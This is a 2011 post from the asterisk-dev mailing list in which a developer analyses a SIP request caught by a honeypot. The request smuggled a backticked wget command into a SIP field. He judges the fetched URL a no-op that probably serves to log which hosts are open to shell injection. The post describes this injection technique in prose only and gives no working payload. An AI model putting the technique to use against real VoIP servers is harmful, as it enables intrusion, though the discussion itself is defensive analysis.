[asterisk-dev] A new kind of SIP attack ?

Tom Browning ttbrowning at gmail.com
Mon Sep 12 08:13:17 CDT 2011


On Mon, Sep 12, 2011 at 8:28 AM, Jeff LaCoursiere <jeff at sunfone.com> wrote:

> Would be interesting to let your honeypot accept the request and perform the
> wget, and see what happens next...

Well I looked at the URL passed to the backticked wget command line
and it is a NOOP as far as I can tell.  (Using a couple URL
vulnerability assessment tools and old fashioned telnet direct
methods!)

I expect that the URL is strictly to populate a web server log that
will provide a convenient list of IP addresses vulnerable to the shell
injection and available for further hacking attempts.

Sadly some perhaps widely used configuration is subject to easy shell
injection (so folks are now scanning for it).  The SIP equiv of "Bobby
Tables" : http://xkcd.com/327/

Tom



More information about the asterisk-dev mailing list